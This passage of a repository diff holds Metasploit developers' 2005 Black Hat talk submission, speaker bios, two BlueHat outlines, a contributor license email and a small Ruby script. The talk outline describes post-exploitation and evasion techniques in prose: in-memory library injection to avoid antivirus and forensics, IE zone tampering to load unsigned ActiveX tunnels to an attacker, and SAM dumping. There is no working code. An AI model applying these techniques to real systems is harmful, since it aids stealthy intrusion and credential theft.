+         i. Robust target definitions
+         ii. Detailed exploit implementation information
+         iii. Entirely payload independent, no hardcoding paylaods
+   C. The power of post-exploitation automation
+      1. Complicated tasks made simple with scripting
+         i. Want to download a targets entire harddrive?
+         ii. Want to disable local user interaction?
+         iii. Want to upload and play an mp3 on the target?
+         iv. Want to 'be' on the target's network?
+      2. Standard interface means cross platform support
+VI. Conclusion - where do we go from here?
+   A. Future Post-exploitation research
+      1. Mesh network support 
+      2. Expansion of the stdapi described in this document
+
+included resources:
+   http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+   http://www.hick.org/code/skape/papers/meterpreter.pdf
+   http://www.hick.org/code/skape/papers/remote-library-injection.pdf
+   http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
+   http://www.metasploit.com/users/spoonm/ordinals.txt
+	
+cited material:
+STRIDE:
+   http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
+
+syscall proxy:
+   http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
+
+

dev/bh/skape_bio.txt

@@ -0,0 +1,7 @@
+Skape is a lead software developer by day and an independent security researcher
+by night.  He joined forces with the Metasploit project in 2004 where his many
+contributions have included the Meterpreter, VNC injection, and many other
+payload advances.  Skape has worked on a number of open-source projects and has
+authored several papers on security related technologies.  His current security
+related intrerests include post-exploitation technologies, payload development
+and optimization, and exploitation prevention technology.

dev/bh/submission_form.txt

@@ -0,0 +1,673 @@
+Date of Submission: 
+
+	04/2005
+
+I would like to present this at: 
+	
+	USA 2005
+
+Personal Information
+
+Primary Speaker Name: 
+	
+	spoonm
+
+Primary Speaker Title (if applicable):
+
+Additional Speaker Name(s), Title(s) and Company(s) (if applicable):
+
+	skape
+
+Speaking on Behalf of:
+
+Primary Contact's Email:
+
+	spoonm@gmail.com
+
+Primary Contact's Telephone:
+
+Speaker's Email (if different from the primary speaker's email):
+
+Speaker's Telephone (if different from the primary speaker's telephone):
+
+Has the speaker spoken at a previous Black Hat event? Yes or No
+
+	Yes
+
+Does the speaker have any professional speaking experience? Yes or No
+
+	Yes
+
+If yes, please list the three most recent engagements.
+
+	- cansecwest 2005 
+	- defcon 2004
+	- blackhat 2004
+
+Has or will this presentation be seen in any form? If so, explain how this
+presentation is different from previous versions, and where/when this material
+has been seen before.
+
+	No
+
+Will or has the speaker(s) be presenting at ANY event 30 days prior to this
+conference? If yes, please specify which event and on what topic(s).
+
+	No
+
+Presentation Information
+
+Name of Presentation:
+
+	- Beyond EIP
+
+Select the track(s) that your talk would be most appropriate for your topic (you
+must select at least one of the nine):
+
+	- Deep Knowledge
+	- 0 Day Attack
+
+How much time does your presentation require? 75 minutes, 90 minutes or 20
+minutes (turbo track) (please specify)
+
+	90 minutes (could do 75 if necessary)
+
+What are the three most important reasons why this is a quality Black Hat talk?
+
+Reason 1:
+
+	Although we continue to publicly release much of our work, there is much
+more involved under the hood than just what's released.  Blackhat is the
+perfect venue to discuss our ideas, research, design, and development in 
+detail.  It's really important to be able to discuss the sort of things we've
+thought very hard about and to present the conclusions that would otherwise
+be taken for granted.
+
+Reason 2:
+	
+	The technology discussed in this presentation impacts a wide number of 
+security related fields including NIDS, HIPS, Anti-Virus, penetration
+testing, and the exploit development cycle in general.
+
+Reason 3:
+
+	Many of the audience members can't be fully engaged in the deep world of
+security research.  This is a chance for them to get a "view from the
+trenches", and see what's actually happening on the attacker security front.
+Audience members will get an idea of where technologies currently stand, how
+they work, and what might be in store for the future.
+
+Is there a demonstration? Yes or No
+
+	Yes
+
+Are the speaker(s) releasing a new tool? Yes or No
+
+	Possibly, or will talk about many recent (within a year) releases.
+
+Are the speaker(s) releasing a new exploit? Yes or No
+
+	No
+
+Is there audience participation? Yes or No
+
+	No
+
+What are your equipment needs?
+
+	1 projector.
+
+Will you require more than 2 lcd projectors? Yes or No - if yes, please specify
+how many
+
+	No
+
+Will you require internet access? Yes or No
+
+	No
+
+Will you require a white board? Yes or No
+
+	No
+
+Will you require any special equipment? Yes or No - if yes, please specify.
+
+	No
+
+Detailed Outline:
+
+Note:
+
+We've tried to include most of the topics that will be covered in our
+presentation.  However, many of these things will be discussed, but will not be
+our main concentration.  The majority of our presentation will be around topic
+V. C, our new post-exploitation advances, and how they will be designed and
+integrated into Metasploit 3.  Metasploit 3 won't be finished in time for
+Blackhat, but more important than the software itself is the work we've done
+on developing the individual components that it will be built from.
+
+This outline is pretty indepth, so it's hard to pick out all the nuggets of
+coolness.  We've developed many really useful technologies in the area of
+payload development.  These are things we've created since last year's
+Blackhat, including many advances in polymorphic shellcode, and
+high-permutation attacks.
+
+I. Introduction
+   A. Who are we?
+      1. spoonm
+      2. skape
+   B. Exploit Technology
+      1. Three Phases of Exploitation
+         a. Pre-exploitation
+         b. Exploitation
+         c. Post-exploitation
+      2. Pre-exploitation - Preparing the payload
+         a. NOP generation
+         b. Payload encoders
+         c. Connection handler initialization
+      3. Exploitation - Leveraging the vulnerability
+         a. Stack overflows
+         c. Heap overflows
+         b. SEH overwrites
+         d. Arbitrary pointer overwrites
+      4. Post-Exploitation - Manipulating the target
+         a. Command shell redirection
+         b. Arbitrary command execution
+         c. Pivoting payloads
+         d. Advanced payload interaction
+   B. Where do we stand?
+      1. Pre-exploitation
+         a. Robust and elegant encoders do exist
+            i. SkyLined's alpha-numeric encoder
+            ii. Spoonm's Shikata Ga Nai
+         b. Payload encoders generally taken for granted
+            i. Most encoders are static with a variable key
+            ii. IDS able to signature static decoder stubs
+         c. NOP generation hasn't publically changed much
+            i. PoC exploits generally use predictable nops, if any
+            ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
+            iii. Not considered very important to many researchers
+         d. NIDS deployments are playing chase the tail
+            i. The mouse always has the advantage; NIDS is reactive
+            ii. Advanced nops and encoders push NIDS to its limits
+      2. Exploitation
+         a. Techniques have become very mature
+            i. Linux/BSD exploitation techniques largely unchanged
+            ii. Win32 heap overflows now more reliable (oded/shok)
+            iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
+         b. Exploitation topics have been beaten to death
+      3. Post-exploitation
+         a. Common payloads are limited
+            i. Command shell interaction has poor automation support
+            ii. Limited to the command set that the interpreter provides
+            iii. Bounded by the utilities installed on the target machine
+            iv. Restrictive environments (chroot) can hinder command execution
+            v. HIPS vendors becoming more adept at detecting basic payloads
+               - LoadLibraryA from the stack, etc (mcafee 8.0i)
+         b. Communication vectors largely unchanged
+            i. Reverse and port-bind payloads still the most common
+            ii. Findsock style payloads still unused by PoC exploits
+            iii. Alternative communication vectors rarely discussed
+         c. Pivoting technology exists
+            i. Core ST described system call proxying in 2002
+            ii. Metasploit's (2.3) meterpreter provides basic network pivoting
+   C. What will we discuss?
+      1. Pre-exploitation Research
+         a. NOP generation
+            i. Opty2
+         b. Encoders
+            i. Additive feedback encoders
+            ii. Shikata Ga Nai
+      2. Post-Exploitation Research
+         a. Library Injection
+            i. Facilitates things like Meterpreter and VNC injection
+         b. VNC Injection
+            i. Introduced at blackhat04 with the Metasploit 2.2 release
+         c. Meterpreter & dN
+            i. The cross-platform post-exploitation suite
+      3. Payload Research
+         a. PassiveX
+            i. Taking advantage of ActiveX controls
+         b. Ordinal Stagers
+            i. Tiny network capable stagers
+         c. Egghunt (maybe?)
+            i. Small payload capable of locating a larger payload
+            ii. Useful for exploits with limited space
+II. Pre-exploitation
+   A. OptyNop2
+      1. Creation and benefits of multi-byte nopsleds
+   B. Additive feedback encoders
+   C. Shikata Ga Nai
+      1. High permutation shellcode through simple dependency mappings
+III. Post-exploitation
+   A. Library Injection
+      1. Overview
+         a. Paper published in 04/2004
+         b. Provides advanced code execution
+         c. Code can be written in any language that can compile down
+            to a shared object.
+         d. Allows developer to use all of the APIs exposed to a normal
+            application.
+         e. Detailed explanation can be found in included resources
+            (include lib inject paper)
+      2. Two types of library injection
+         a. On-Disk
+            i. Library is loaded from the target's harddrive or via a
+               file share.
+            ii. Can be detected by AV products due to fs access
+         b. In-Memory
+            i. Library is uploaded to the target and loaded from memory
+               without touching the disk
+            ii. Evades file system filter drivers, such as those
+                provided by AV companies
+            iii. Not touching the disk means no forensic trace
+            iv. VirtualLock prevents swapping to disk, but requires admin
+      3. In-memory library injection on Windows
+         a. System calls used by the library loader are hooked
+            i. NtCreateFile
+            ii. NtMapViewOfSection
+            iii. etc
+         b. Unique image name is used to identify the image to image that
+            is in memory
+         c. System call hooks are removed so that future injectino can
+            occur
+         d. Alternative approaches
+            i. Could do client-side relocations, but would need to handle
+               import processing
+      4. In-memory library injection on Linux/BSD
+         a. No known public implementations
+         b. Requires alternate approach
+            i. Hooking API routines not always possible -- symtab not
+               mapped into memory
+            ii. libc symbol version mismatches lead to linking nightmares
+         c. Client-side relocations seem most feasible
+            i. Remote side maps a region of memory and sends the client 
+               the base address
+            ii. Client processes relocations and transmits the relocated
+                image as its mapped segment would appear
+            iii. Requires locating rtld base so that PLT lookups will
+                 work
+   B. VNC Injection
+      1. Implements VNC as an injectable DLL
+         a. Uses RealVNC as the code-base
+         b. VNC communication uses the exploit connection
+         c. No physical trace is left of the VNC server
+         d. Can operate regardless of existing VNC installations
+      2. Easy way to illustrate insecurities
+         a. Suits understand mouse movement better than black box command 
+            prompts
+   C. Meterpreter
+      1. Generic post-exploitation suite
+         a. Based on library injection
+         b. Uses the established exploit connection
+            i. Especially powerful with findsock payloads; no new connection
+         c. Executes entirely from memory
+         d. No new processes or file access required for the payload to
+            succeed
+         e. Detailed explanation can be found in included resources
+            (include meterpreter paper)
+      2. Extension system provides advanced automation support
+         a. No need to hand write tedious assembly
+         b. Existing native code can be ported to a meterpreter extension
+      3. Architecture
+         a. Design goals
+            i. Very flexible protocol; should adapt to extension requirements
+            ii. Exposure of a channelized communication system to extensions
+            iii. Stealth operation
+            iv. Should be portable to various operating systems
+            v. Client from one platform should work with server on another
+               platform
+         b. Protocol
+            i. Uses TLVs (Type-Length-Value) to support arbitrary data
+               passing.
+            ii. TLVs allow the packet parser to be oblivious to the structure
+                of the value field
+            iii. Type field is broken down into meta types
+      4. Core interface
+         a. Overview
+            i. Minimal interface to support the loading of extensions
+            ii. Implements the basic packet transmission and dispatching
+                facilities
+            iii. Exposes channel allocation and management to extensions
+         b. Advanced features
+            i. Migrating the server instance between processes
+      5. The ``stdapi'' extension
+         a. Overview
+            i. Included in Metasploit 3.0
+            ii. Provides access to some of the common subsystems of the
+                target operating system
+            iii. Allows for easy automation and implementation of robust
+                 post-exploitation scripts
+         b. File System
+            i. File and directory interaction
+            ii. Files can be uploaded and downloaded between the
+                attacker and the target
+         c. Network
+            i. Transparent network pivoting
+            ii. Route table enumeration and manipulation
+            iii. Local interface enumeration
+         d. Process
+            i. Process execution, optionally with channelized IO
+            ii. Enumeration of running processes
+            iii. Modification of arbitrary memory
+            iv. Creation and modification of running threads
+            v. Loading and interacting with shared object files
+         e. Registry
+            i. General registry API access
+            ii. Opening, creating, and removing registry keys
+            iii. Setting, querying, and deleting registry values
+            iv. Enumeration of both keys and values
+         f. User interface
+            i. Disabling local user interaction via the keyboard
+               and/or mouse (similar to VNC)
+            ii. Idle timeout checking to see how long it's been
+                since the user did something interactive
+      6. The ``priv'' extension
+         a. Still in development
+         b. Exposes an interface to escalating local privileges
+            through local vulnerabilities
+         c. SAM dumping support similar to pwdump3
+   D. dN
+      1. Simple low-footprint post-exploitation tool
+      2. Useful to scope out execution enviroment, then bootstrap other tools
+IV. Payload Research
+   A. PassiveX
+      1. Overview
+         a. Post-exploitation payload
+         b. A derivative of On-Disk library injection that uses
+            ActiveX controls
+         c. Supports arbitrary DLL injection in any language that can
+            be compiled as an ActiveX control (C++, VB, etc)
+         d. Detailed analysis can be found in included resources
+            (include passivex paper)
+      2. Payload Implementation
+         a. Disables iexplore Internet zone restrictions on 
+            ActiveX controls
+            i. Modifies four registry values that are stored per-user
+         b. Launches a hidden iexplore at a URL with an embedded
+            OCX
+            i. The OCX does not have to be signed
+            ii. No user interaction is required
+            iii. OCX is automatically downloaded, registered, and loaded
+                 into the browser's context
+      3. Sample HTTP tunneling ActiveX control
+         a. HTTP GET/POST used to build tunnel to attacker
+            i. Uses the WININET API
+            ii. Outbound traffic from target machine encapsulated in POST
+                request
+            iii. Inbound traffic from attacker encapsulated in GET response
+            iv. Proxy configuration automatically inherited
+            v. Requires HTTP server capable of performing encap/decap on the 
+               HTTP packets
+         b. Streaming connection through HTTP tunnel can be created
+            i. socketpair doesn't exist natively on win32 but can be simulated
+               with a local listener
+            ii. Streaming abstraction allows advanced payloads to transparently
+                use the HTTP transport (Meterpreter, VNC)
+            iii. Local listener less covert, but highly beneficial
+      4. Pros
+         a. Bypasses restrictive outbound filters
+         b. Re-uses proxy configuration
+         c. Looks like normal user traffic
+         d. Allows full access to the win32 API like all forms of 
+            library injection
+      5. Cons
+         a. Touches the disk
+         b. Requires administrative access
+            i. Internet Explorer prohibits the downloading of 
+               ActiveX controls as non-admin
+   B. Windows Ordinal Stagers
+      1. Overview
+         a. Technique from Oded's lightning talk from core04
+         b. Uses static ordinals to locate winsock symbol addresses
+         c. Compatible with all versions of Windows
+         d. 92 byte reverse stager, 93 byte findsock stager
+         e. Detailed explanation can be found in included resources
+            (include spoonm ordinal paper)
+      2. Reverse Ordinal Stager
+         a. Walks InitOrderModuleList searching for ws2_32
+         b. Uses static ordinals to index the export table
+         c. Creates fd with socket
+         d. Chains connect and recv frames
+         e. Returns into buffer read in from file descriptor
+   C. Egghunting
+      1. Overview
+         a. Small stub payload that can search for a larger payload
+         b. Useful for exploits that have limited payload space but can
+            stash more payload elsewhere in memory
+         c. Example exploits include the IE object type vulnerability.
+         d. Goal is to safely search target address space for the larger
+            payload.
+         e. Larger payload is located by searching for an egg that is prepended
+            to it.
+         f. Detailed analysis can be found in included resources
+            (include egghunt paper)
+      2. Two primary methods of egghunting on Windows
+         a. SEH
+            1. 60 bytes in size, searches for an 8 byte egg, compatible with all
+               versions of Windows (including 9x)
+            2. Installs a custom exception handler
+            3. Begins walking the address space
+               i. When a bad address is encounter, the current pointer is
+                  incremented by PAGE_SIZE
+               ii. When a mismatch of the egg is encountered, the current pointer
+                   is incremented by one
+            4. Each address is compared against the 8-byte egg
+               i. Bad addresses will throw exceptions which will be handled
+                  by the custom exception handler
+            5. When the egg is found, jump past the egg into the larger payload
+         b. System call
+            1. Very small stub (32 bytes), searches for an 8 byte egg, only
+               compatible with NT+
+            2. Uses a non-intrusive system call (NtDisplayString) to search validate
+               addresses
+               i. Same page walking logic as SEH is used
+            3. When the egg is found, jump past the egg into the larger payload
+      3. One primary method of egghunting on Linux
+         a. System call
+            1. 30 bytes in size, searches for an 8 byte egg
+            2. System call technique applies to other UNIX variants as well
+            3. Uses the sigaction system call to validate 16 bytes at once
+            4. Pros
+               i. Very small
+            5. Cons
+               i. Corner cases may cause it to be unstable
+V. The Complete Picture - Metasploit 3.0
+   A. The power of pre-exploitation prepartion
+      1. Abstract NOP generation
+      2. Abstract payload encoding
+      3. Abstract exploit connection handlers
+         i. Bind handler
+         ii. Reverse handler
+         iii. Findsock handler
+   B. The power of exploit generalization
+      1. Standardized exploit creation interface
+         i. Robust target definitions
+         ii. Detailed exploit implementation information
+         iii. Entirely payload independent, no hardcoding paylaods
+   C. The power of post-exploitation automation
+      1. Complicated tasks made simple with scripting
+         i. Want to download a targets entire harddrive?
+         ii. Want to disable local user interaction?
+         iii. Want to upload and play an mp3 on the target?
+         iv. Want to 'be' on the target's network?
+      2. Standard interface means cross platform support
+VI. Conclusion - where do we go from here?
+   A. Future Post-exploitation research
+      1. Mesh network support 
+      2. Expansion of the stdapi described in this document
+
+included resources:
+   http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+   http://www.hick.org/code/skape/papers/meterpreter.pdf
+   http://www.hick.org/code/skape/papers/remote-library-injection.pdf
+   http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
+   http://www.metasploit.com/users/spoonm/ordinals.txt
+	
+cited material:
+STRIDE:
+   http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
+
+syscall proxy:
+   http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
+
+Abstract:
+
+When we built Metasploit, our focus was on the exploit development process. We
+tried to design a system that helped create reliable and robust exploits. While
+this is obviously very important, it's only the first step in the process. What
+do you do once you own EIP? Our presentation will concentrate on the recent
+advancements in shellcode, IDS/firewall evasion, and post-exploitation systems.
+We will discuss the design and implementation of the technologies that enable
+complex payloads, such as VNC injection, and the suite of tools we've built upon
+them. We will then present a glimpse of the next generation of Metasploit, and
+how these new advances will serve as its backbone.
+
+Blog Entry:
+
+Blog entry, Stardate April, 2005
+
+We have recently been on a new shellcode kick, but this time it's not about
+making them smaller. We're currently working on building very powerful new
+post-exploitation shellcode and toolkits, and a very powerful unified API to
+expose their functionality. This will allow us to diverge from precanned
+payloads, which will in turn allow users to quickly build powerful and portable
+post-exploitation tools. We have built strongly upon our Windows DLL
+injection, and are working on extending similar functionality to the land of
+Unix.  We're also working hard on the next version of Metasploit, which follows
+this same philosophy of embedability and extensablity, allowing users to build
+their own tools on top of our framework. Our previous work was all about exploit
+frameworks. In our new approach we are really building more of a hacker tool
+framework, allowing very strong automation and customization.
+
+Supporting File(s):
+
+Additional files/materials? No
+
+Speaker's Bio(s):
+
+Spoonm:
+
+Since late 2003, spoonm has been one of the core developers behind the
+Metasploit Project. He is responsible for much of the architecture in version
+2.0, as well as other components including encoders, nop generators, and a
+polymorphic shellcode engine. A full-time student at a northern university,
+spoonm spends too much of his free time on security research projects.
+
+Skape:
+
+Skape is a lead software developer by day and an independent security researcher
+by night.  He joined forces with the Metasploit project in 2004 where his many
+contributions have included the Meterpreter, VNC injection, and many other
+payload advances.  Skape has worked on a number of open-source projects and has
+authored several papers on security related technologies.  His current security
+related interests include post-exploitation technologies, payload development
+and optimization, and exploitation prevention technology.
+
+Transfer of Copyright
+
+I warrant that the above work has not been previously published elsewhere, or if
+it has, that I have obtained permission for its publication by Black Hat, Inc.
+and that I will promptly supply Black Hat, Inc. with wording for crediting the
+original publication and copyright owner.
+
+If I am selected for presentation, I hereby give Black Hat, Inc. permission to
+duplicate, record and redistribute this presentation; including, but not limited
+to, the conference proceedings, conference CD, video, audio, hand outs(s) to the
+conference attendees for educational, on-line and all other purposes.
+
+Yes, I, (insert primary speaker name), have read the above and agree to the
+Transfer of Copyright.
+
+Agreement to Terms of Speaking Requirements
+
+If I am selected to speak, I understand that I must complete and fulfill the
+following requirements or I will forfeit my honorarium:
+
+1) I will submit a completed presentation in Powerpoint format for publication
+in the printed conference proceedings by the date specified in the CFP Letter of
+Acceptance.
+
+2) I understand if I fail to submit a completed presentation by the date
+specified in the CFP Letter of Acceptance, I may be replaced by an alternate
+presentation or, if allowed to present, will forfeit $250 of my honorarium.
+
+3) I will submit a completed (and possibly updated) presentation, a copy of the
+tool(s) and/or code(s), and a reference to all of the tool(s), law(s), Web sites
+and/or publications referenced to at the end of my talk and as described in this
+CFP submission for publication on the conference CD by the date specified in the
+CFP Letter of Acceptance.
+
+4) I will include a detailed bibliography as either a separate document or
+included within the presentation of all resources cited and/or used in my
+presentation.
+
+5) I will be on hand and accessible to delegates during Black Hat social events
+including, but not limited to, luncheons and receptions.
+
+6) I will complete my presentation in the time allocated to me - not ending 15
+minutes before or running 5 minutes over the time allocation.
+
+7) I understand that Black Hat will provide 2 lcd projectors, 2 screens,
+microphone, and video switch box. I understand that I am responsible for
+providing all other necessary equipment, including laptops and machines, to
+complete my presentation.
+
+8) I will submit, within 5 days of the completion of the conference, any
+updated, revised or additional presentation(s) or materials that were used in my
+presentation but not included on the conference CD or conference proceedings.
+
+I, spoonm, have read the above and understand and agree
+to the terms as detailed in the Agreement to Terms of Speaking Requirements.
+
+Agreement to Terms of Speaking Remuneration
+
+1) I understand that Black Hat will only pay for one roundtrip coach class
+airfare per presentation.
+
+2) I understand that if I choose to arrange the airfare myself, I must first
+receive approval from the Conference Administrator or I will not be reimbursed
+for the airfare. I understand that if I wish to be reimbursed for airfare, I
+must supply a valid receipt in the form of a travel agency issued air itinerary
+and/or ticket receipt with the airfare printed on it. I understand that there is
+a $750 cap for airfare and I will be reimbursed for up to that amount.
+
+3) I understand that if I choose to travel by automobile I will receive $0.32
+per mile, roundtrip, as reimbursement. If I travel by rail or bus I will be
+reimbursed for the cost of the ticket price.
+
+4) I understand that Black Hat will pay for one hotel room for three nights at
+the official venue hotel.
+
+5) I understand that I will be required to provide the hotel with a valid credit
+card on check in to secure the room and any and all additional costs incurred by
+me (including but not limited to room service, phone line usage, room internet
+access, movies, etc) WILL NOT be reimbursed by Black Hat.
+
+6) I understand that the person listed as the primary speaker will be required
+to complete a W9 form (only if a US citizen) in order to be paid. Non-US
+citizens will be paid via wire transfer (or you may choose to be paid with a
+company check).
+
+7) I understand that Black Hat will issue one payment per presentation and the
+check will be issued to the person listed as the primary speaker. Payment will
+be made net 30 from the end of the conference.
+
+8) I understand that the name and address on the W9 or wire transfer is where
+the payment will be sent.
+
+9) I understand that if I am employed by an official Black Hat sponsor, that I
+will not receive any compensation for travel, hotel accommodations or an
+honorarium from Black Hat, Inc.
+
+10) I understand that should my talk be determined to be a vendor or sales pitch
+that I will not receive any reimbursement for travel, hotel accommodations or an
+honorarium.
+
+11) I understand that should my talk be selected for the "Turbo Talks" I will
+ONLY receive entrance to the Briefings. As a "Turbo Talks" presenter, I WILL NOT
+receive a speaking honorarium or compensation for hotel or travel.
+
+Yes, I, spoonm, have read the above and understand and
+agree to the terms as detailed in the Agreement to Terms of Speaking
+Remuneration or I will forfeit my honorarium.

dev/bluehat/06v1/asp_outline.txt

@@ -0,0 +1,81 @@
+Title:
+
+            Bitten on the ASP
+
+(How NOT to deploy ASP.NET applications)
+
+
+Intro:
+	
+	Who
+		BreakingPoint
+		Metasploit
+	What
+		ASP.Net deployment issues
+			Default configuration
+			Common configuration flaws
+			Platform problems
+	Why
+		Widely deployed
+		Poorly researched
+		Lack of tools
+
+Basics
+
+	Global default configuration file
+	Code separated into Applications
+	Applications override configuration file
+
+Structure
+	Sample web application structure
+	Visual studio files
+	Deploy vs Copy
+
+IIS Integration	
+	Extension vs ASP.Net mappings
+		What files have no mapping?
+
+Cryptography
+	MAC Key
+	Encryption Key
+	ViewState / Session Generation
+	
+Sessions
+	CookieLess
+	InProcess
+	StateServer
+		Possible flaws
+	SQL Database
+		Field lengths, character data
+	Sliding Sessions...
+		Florida example
+		
+Error Handling
+	Default settings
+	aspxerrorpath tricks
+	Information disclosure
+
+Forms Authentication
+	?
+	
+ViewState Information
+	Data leak, MAC, etc.
+	
+Debugging
+	Debugging left enabled
+	Tracing left enabled!
+
+Overview
+	Locking down ASP.Net is not hard
+	Thousands of sites arent doing it
+		Microsoft Terra ServerDopostback/rss.aspx
+		Microsoft Research
+Summary
+	Vulns
+	Tools
+	Fixes
+Done
+	
+	
+	
+IssueTracker.mdb

dev/bluehat/06v1/msf_outline.txt

@@ -0,0 +1,75 @@
+Title:
+
+	Metasploit^3
+
+Intro:
+	
+	Who
+		BreakingPoint
+		Metasploit
+	What
+		Exploit framework evolution
+		
+	Why
+		Exploits are commodities
+		Integration is the tricky part
+		Who needs a shell when...
+		Merge of two distinct users
+			Network admins
+			Penetration testers
+
+Exploit Frameworks
+	Development platform for exploit code
+	Shrink exploit development time
+	Enable security research
+	Automation
+
+Metasploit
+	Started off with ~7 exploits
+	v1 - 2,000 lines of perl
+	v2 - 40,000 lines of perl, 3,000 asm, 7,000 C
+	v3 - 80,000 lines of perl, 4,000 asm, 12,000 C
+	Exploit launcher
+		Modular components
+		Consistent interface
+		Three UI's
+Metasploit^3
+	Complete rewrite in the Ruby language
+	Code compression ~40%
+	Completely OO, no more dirty perl tricks
+	Focused on simplicity, consistency, extensibility
+
+Architecture
+	Rex Library
+	MSF Library
+	MSF Core
+	MSF Interfaces
+
+Libraries
+	Create your own MSF app in ~5 lines of code :-)
+	Simple to work with any module programatically
+	Write standalone security apps using our libs
+
+Concepts
+	Interfaces
+		Load and interact with modules
+	Jobs
+		Modules running in the background
+	Sessions
+		Interactive shells and more
+Modules
+	Payloads
+	Encoders
+	Nops
+	Exploits
+	Auxiliary
+	
+Plugins
+	Extend anything at runtime
+	
+Examples
+	Reconnaisance module
+	Passive exploit modules
+	Handling multiple sessions
+		
+	

dev/contrib/MSF_nolimit.bugtraq@gmail.com.txt

@@ -0,0 +1,75 @@
+From nolimit.bugtraq@gmail.com Sun Jan 22 16:40:09 2006
+From nolimit.bugtraq@gmail.com Sun Jan 22 22:39:35 2006
+Return-Path: <nolimit.bugtraq@gmail.com>
+X-Spam-Checker-Version: SpamAssassin 3.1.0-gr0 (2005-09-13) on sugar.14x.net
+X-Spam-Level: 
+X-Spam-Status: No, score=-2.1 required=5.0 tests=BAYES_00,HTML_40_50,
+	HTML_MESSAGE autolearn=ham version=3.1.0-gr0
+Delivered-To: hdm-hdm@metasploit.com
+Received: (qmail 8349 invoked from network); 22 Jan 2006 16:39:35 -0600
+Received: from unknown (HELO uproxy.gmail.com) (66.249.92.203)
+  by sugar.14x.net with SMTP; 22 Jan 2006 16:39:35 -0600
+Received: by uproxy.gmail.com with SMTP id j3so504335ugf
+        for <hdm@metasploit.com>; Sun, 22 Jan 2006 14:40:09 -0800 (PST)
+DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
+        s=beta; d=gmail.com;
+        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
+        b=FBG7YV3XXWeZisoQR5v8dxhWbwA/m0bXqv9oL5+jChFGrjP4k1cR2k8HdCygCpy1yJQoMLwlbPNVtdUkYMAoFg+fTTRDbZiiM8XQtidhcaM41Hbep60wkSBX8UemqRSLFaX0fRqiNDkHrAyEkVZOedxEwEzy+YYDFeqEiGVWib8=
+Received: by 10.66.219.19 with SMTP id r19mr1989749ugg;
+        Sun, 22 Jan 2006 14:40:09 -0800 (PST)
+Received: by 10.66.255.7 with HTTP; Sun, 22 Jan 2006 14:40:08 -0800 (PST)
+Message-ID: <786b40bf0601221440x27049938h4c4fd527c23b930c@mail.gmail.com>
+Date: Sun, 22 Jan 2006 17:40:09 -0500
+From: nolimit bugtraq <nolimit.bugtraq@gmail.com>
+To: H D Moore <hdm@metasploit.com>
+Subject: Re: Metasploit Framework License
+In-Reply-To: <200601221520.34147.hdm@metasploit.com>
+MIME-Version: 1.0
+Content-Type: multipart/alternative;
+  boundary="----=_Part_10104_11843058.1137969609003"
+References: <200601221520.34147.hdm@metasploit.com>
+Status: R
+X-Status: NC
+X-KMail-EncryptionState:  
+X-KMail-SignatureState:  
+X-KMail-MDN-Sent:  
+
+------=_Part_10104_11843058.1137969609003
+Content-Type: text/plain; charset=ISO-8859-1
+Content-Transfer-Encoding: quoted-printable
+Content-Disposition: inline
+
+I give you full rights to use any exploits I've published in the metasploit
+framework, and continue to be honored by it.
+
+On 1/22/06, H D Moore <hdm@metasploit.com> wrote:
+>
+> Hello,
+>
+> I you are receiving this email, there is a good chance that you
+> contributed to the Metasploit Framework sometime in the past.
+> Starting with version 3.0, we are changing the licensing terms.
+> <CUT>
+>
+
+------=_Part_10104_11843058.1137969609003
+Content-Type: text/html; charset=ISO-8859-1
+Content-Transfer-Encoding: quoted-printable
+Content-Disposition: inline
+
+I give you full rights to use any exploits I've published in the metasploit=
+ framework, and continue to be honored by it. <br><br>
+<div><span class=3D"gmail_quote">On 1/22/06, <b class=3D"gmail_sendername">=
+H D Moore</b> &lt;<a href=3D"mailto:hdm@metasploit.com">hdm@metasploit.com<=
+/a>&gt; wrote:</span>
+<blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0=
+px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I you are receivin=
+g this email, there is a good chance that you<br>contributed to the Metaspl=
+oit Framework sometime in the past.
+<br>Starting with version 3.0, we are changing the licensing terms.<br>&lt;=
+CUT&gt;<br></blockquote></div>
+
+------=_Part_10104_11843058.1137969609003--
+
+
+

dev/correlate.rb

@@ -0,0 +1,55 @@
+#!/usr/local/bin/ruby
+
+if ARGV.empty?
+  puts "usage: <delta value | t> <files ...>"
+  exit(1)
+end
+
+textmode = false
+
+if ARGV[0] == 't'
+	ARGV.shift
+	textmode = true
+else
+	delta = ARGV.shift.to_i
+end
+
+first = TRUE
+last = [ ]
+
+# simple algorithm, build up a list of all the possible addresses
+# calculating the delta range for each address in the file... then
+# just do a set intersection across these all and you have your results
+
+ARGV.each do |file|
+  cur = [ ]
+  IO.foreach(file) do |line|
+    if textmode
+      cur << line
+    else
+      addr = line.hex
+      (-delta .. delta).each do |d|
+        cur << addr + d
+      end
+    end
+  end
+
+  if first
+    first = FALSE
+    last = cur
+  else
+    last = last & cur
+  end
+    
+end
+
+# print da results
+
+last.each { |l|
+  if textmode
+    puts l
+  else
+    puts "0x%08x" % l
+  end
+}
+

dev/csw05/admtable.tex

@@ -0,0 +1,77 @@
+\definecolor{Hexy110}{rgb}{0.431,0,0.568}
+\definecolor{Hexy118}{rgb}{0.462,0,0.537}
+\definecolor{Hexy135}{rgb}{0.529,0,0.470}
+\definecolor{Hexy106}{rgb}{0.415,0,0.584}
+\definecolor{Hexy107}{rgb}{0.419,0,0.580}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy106}{rgb}{0.415,0,0.584}
+\definecolor{Hexy104}{rgb}{0.407,0,0.592}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy102}{rgb}{0.4,0,0.6}
+\definecolor{Hexy119}{rgb}{0.466,0,0.533}
+\definecolor{Hexy111}{rgb}{0.435,0,0.564}
+\definecolor{Hexy109}{rgb}{0.427,0,0.572}
